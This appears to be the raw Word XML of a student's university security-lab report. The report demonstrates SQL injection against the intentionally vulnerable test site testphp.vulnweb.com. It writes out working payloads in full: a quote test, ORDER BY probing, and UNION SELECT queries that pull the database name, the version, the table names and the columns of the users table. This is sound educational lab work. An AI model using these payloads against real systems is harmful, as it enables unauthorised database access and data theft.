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B503D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3C2B2E" w:rsidRPr="00B503DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4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tudent Name: Sahul Kumar Parida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>UID: 20BCS4919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Branch: CSE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3C2B2E" w:rsidRPr="00B503D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28</w:t>
      </w:r>
      <w:r w:rsidR="00950444" w:rsidRPr="00B503DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/09</w:t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/2022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Name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2B2E" w:rsidRPr="00B503DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Web and</w:t>
      </w:r>
      <w:r w:rsidR="003C2B2E" w:rsidRPr="00B503D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Mobile</w:t>
      </w:r>
      <w:r w:rsidR="003C2B2E" w:rsidRPr="00B503D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Security</w:t>
      </w:r>
      <w:r w:rsidR="00D132B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab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Code: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 20CSP-333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6DE" w:rsidRPr="00B503DF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CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036C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Aim:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B503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36CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB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ing of SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="90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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5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6CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="902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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection Attack from command line(url).</w:t>
      </w:r>
      <w:r w:rsidRPr="00B503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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB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Software/Hardware Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB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indows 7 &amp; above version </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB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Tools to be used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB8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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQLMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB8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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB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Theory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00325829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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00036CB8" w:rsidRPr="00B503DF">
          <w:rPr>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>SQL Injection (SQLi)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00036CB8" w:rsidRPr="00B503DF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> is a type of an </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00036CB8" w:rsidRPr="00B503DF">
          <w:rPr>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>injection attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00036CB8" w:rsidRPr="00B503DF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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Steps/Method/Coding:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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t xml:space="preserve">Open the link- </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r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</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRDefault="00036CB8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3CC18CF" wp14:editId="6C312AF2">
            <wp:extent cx="6600825" cy="371113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255" cy="37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B503DF" w:rsidRPr="00B503DF" w:rsidRDefault="00B503DF" w:rsidP="00036C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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Go to-  </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r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listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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503DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A68B386" wp14:editId="63002ADC">
            <wp:extent cx="6781800" cy="38128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0876" cy="38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B8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036C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036CB8" w:rsidRDefault="00036CB8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3DF" w:rsidRPr="00B503DF" w:rsidRDefault="00B503DF" w:rsidP="00036C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CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00036CB8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">You'll inject the malicious code (cheat code)- </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r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listproducts.php?cat=</w:t>
        </w:r>
        <w:r w:rsidRPr="00B503DF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-1’</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D0FE5" w:rsidRDefault="00036CB8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ECE5471" wp14:editId="311393E7">
            <wp:extent cx="7010400" cy="394140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5572" cy="39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P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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8" w:rsidP="00B503DF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:contextualSpacing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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Put the random number, cheat code - </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r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listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink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t xml:space="preserve"> order by 11 clause to check the row (tuple).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036CB8" w:rsidRPr="00B503DF" w:rsidRDefault="00036CB8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84C926F" wp14:editId="68BC0530">
            <wp:extent cx="7166338" cy="402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84683" cy="40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62" w:rsidRDefault="00596E62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B503DF" w:rsidRPr="00B503DF" w:rsidRDefault="00B503DF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596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62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596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62" w:rsidP="00B503DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:contextualSpacing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t>Information gathering-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62" w:rsidP="00596E6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t xml:space="preserve">To check the database name, Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r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listproducts.php?cat=-1 union</w:t>
        </w:r>
      </w:hyperlink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t xml:space="preserve"> select 1,2,3,4,5,6,7,8,9,10,database( )—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596E62" w:rsidRDefault="00596E62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E814EA0" wp14:editId="00281183">
            <wp:extent cx="6759741" cy="38004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7793" cy="38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Pr="00B503DF" w:rsidRDefault="0014681F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Pr="0014681F" w:rsidRDefault="00596E62" w:rsidP="0014681F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">To check the database version ,Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r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listproducts.php?cat=-1 union</w:t>
        </w:r>
      </w:hyperlink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t xml:space="preserve"> select 1,2,3,4,5,6,7,8,9,10,version()—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62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F5071E5" wp14:editId="739AA8AF">
            <wp:extent cx="6753225" cy="37968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7" cy="38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62" w:rsidRDefault="00596E62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Pr="00B503D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596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62" w:rsidP="0014681F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color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Information to be fetch-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62" w:rsidP="00596E6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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Table name- cat=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00325829" w:rsidP="0014681F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00596E62" w:rsidRPr="00B503DF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://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00596E62" w:rsidRDefault="00596E62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76F52A6" wp14:editId="6313C7BD">
            <wp:extent cx="6844444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3585" cy="38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F" w:rsidRDefault="0014681F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Pr="00B503DF" w:rsidRDefault="0014681F" w:rsidP="00596E62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596E62" w:rsidRPr="00B503DF" w:rsidRDefault="00596E62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 w:rsidRPr="00B503DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Column name- </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00B503DF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004F453A" w:rsidRDefault="00596E62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503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3A28919" wp14:editId="4DAEDFEF">
            <wp:extent cx="7217162" cy="40576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51838" cy="40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57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C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 the given screenshot you can see we have got an error message which means the running site is infected by SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C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ybe we can get some important data from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74C5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s</w:t>
      </w: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table, so let’s penetrate more inside.  Again Use the concat function for table users for retrieving its entire column names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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  <w:r w:rsidRPr="00A74C57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We successfully retrieve all eight column names from inside the table users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsidR="004F453A" w:rsidRDefault="004F453A" w:rsidP="00A74C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F14377" wp14:editId="3CB60D90">
            <wp:extent cx="7217164" cy="40576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19886" cy="4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57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C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 Outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C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</w:rPr>
        <w:t>A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 completing this exercise, we are </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ab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to: Detect SQL Injection. We </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>completed the following exercises: - SQL Injection Techniques, Launch a SQL Injection Attack Launch a SQL Injection Attack from command line(url</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A74C5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4C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C5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the above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creenshot we can see that we </w:t>
      </w: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ve got an error message which means the running site is infected by SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C5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w using ORDER BY keyword to sort the records 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ascending or descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C5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 the next query to fetch the name of the databas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74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C5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xt query will extract the version of the database syste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74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C5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rough the next query, we will try to fetch table name inside the databas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74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C5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C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We successfully retrieve all eight column names from inside the table users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74C57" w:rsidRPr="00A74C57" w:rsidRDefault="00A74C57" w:rsidP="00A74C57">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="187" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74C57" w:rsidRPr="00B503DF" w:rsidRDefault="00A74C57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sectPr w:rsidR="00A74C57" w:rsidRPr="00B503DF" w:rsidSect="004D7FEF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29" w:rsidRDefault="00325829">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00325829" w:rsidRDefault="0032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5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29" w:rsidRDefault="00325829">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00325829" w:rsidRDefault="0032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14681F"/>
    <w:rsid w:val="001E0F8E"/>
    <w:rsid w:val="001E13C2"/>
    <w:rsid w:val="002243CE"/>
    <w:rsid w:val="002B1CCC"/>
    <w:rsid w:val="002B718C"/>
    <w:rsid w:val="002D4C61"/>
    <w:rsid w:val="00300AD2"/>
    <w:rsid w:val="00325829"/>
    <w:rsid w:val="003C2B2E"/>
    <w:rsid w:val="003D69C3"/>
    <w:rsid w:val="00495F14"/>
    <w:rsid w:val="004D7FEF"/>
    <w:rsid w:val="004F453A"/>
    <w:rsid w:val="00563B52"/>
    <w:rsid w:val="00596E62"/>
    <w:rsid w:val="008A1A9E"/>
    <w:rsid w:val="008F7585"/>
    <w:rsid w:val="00950444"/>
    <w:rsid w:val="009C4027"/>
    <w:rsid w:val="009D0FE5"/>
    <w:rsid w:val="00A50A16"/>
    <w:rsid w:val="00A74C57"/>
    <w:rsid w:val="00A77671"/>
    <w:rsid w:val="00B503DF"/>
    <w:rsid w:val="00BF3FE7"/>
    <w:rsid w:val="00C24367"/>
    <w:rsid w:val="00C83074"/>
    <w:rsid w:val="00D132B4"/>
    <w:rsid w:val="00D65E9B"/>
    <w:rsid w:val="00E3246D"/>
    <w:rsid w:val="00E977F7"/>
    <w:rsid w:val="00EB76DE"/>
    <w:rsid w:val="00F50DD9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D4549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cti.com/learn/sql-injection-sqli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testphp.vulnweb.com/listproducts.php?cat=-1%20union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testphp.vulnweb.com/listproducts.php?cat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testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1%20un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testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x757365727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hyperlink" Target="http://testphp.vulnweb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unetix.com/blog/articles/injection-attacks/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1&#8217;" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--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4A79-73D7-47B3-8214-04B9BE30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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-14T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09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